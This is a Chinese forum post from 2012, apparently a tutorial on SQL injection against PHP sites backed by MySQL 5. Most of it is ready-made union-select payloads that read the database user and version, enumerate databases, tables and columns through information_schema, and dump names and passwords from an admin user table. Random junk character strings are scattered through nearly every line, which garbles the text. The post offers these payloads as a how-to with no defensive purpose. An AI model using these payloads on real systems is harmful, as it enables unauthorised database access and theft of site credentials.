* }* l1 Y- j& m- k0 X0 Q
教程内容:Mysql 5+php 注入
1 h. a1 X* l8 V5 J
2 Z S3 [$ O) J% O3 E: s' g6 ?, `! y0 q
/ H# D, i/ L( I& q1 ]9 D9 k+ K一.查看MYSQL基本信息(库名,版本,用户)
2 d8 N7 U8 J' s3 ]& I# L: Z8 X2 H( J/ U( h6 k
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
6 D' j, H& b& `. h# i! f M, K ]3 u1 X* u
二.查数据库. e$ B8 N/ M; R$ r+ K0 H
( O+ _9 D9 l- c5 _+ O2 i" W9 H$ @
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
, |7 b9 ?6 B- ~( P( llimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
# k# z/ R' ?0 R! K! p1 C+ _4 O
/ A8 H1 K. d6 i& V$ z1 n9 }三.暴表- Z) x5 e/ W1 G6 A: a) \ k
) ?/ T! W1 [# Z- @! w2 f/ ^, wand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*/ n6 ~! ~4 _: k# S. `: f
' Z. ^- }; t6 ]9 y5 N: W8 f
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
2 |% O% J. c0 s0 H" C) K
p- ]5 `$ Z' \+ o四.暴字段
# H* J9 P6 s+ R( S- d& G% T; Q. C! N5 A
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*4 T: b. ?0 W$ |8 M
4 T$ M! i o# l. R1 Z) I9 u& o
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
* U& I5 y+ Y3 }& u. ?; [7 m7 p% I2 r/ `: J. M+ `9 }
五.暴数据
* l- n. i! e2 [- |
a8 l6 ?8 C1 _0 _& j/ U5 nand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
+ s; x8 l7 }- g- a: L1 _3 u$ G+ E0 n5 u. a
4 L9 X8 v3 {' t9 [这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。, r! |$ P. R) P$ G8 B
|
发表于 2012-9-13 16:27:53
收藏
分享
支持
反对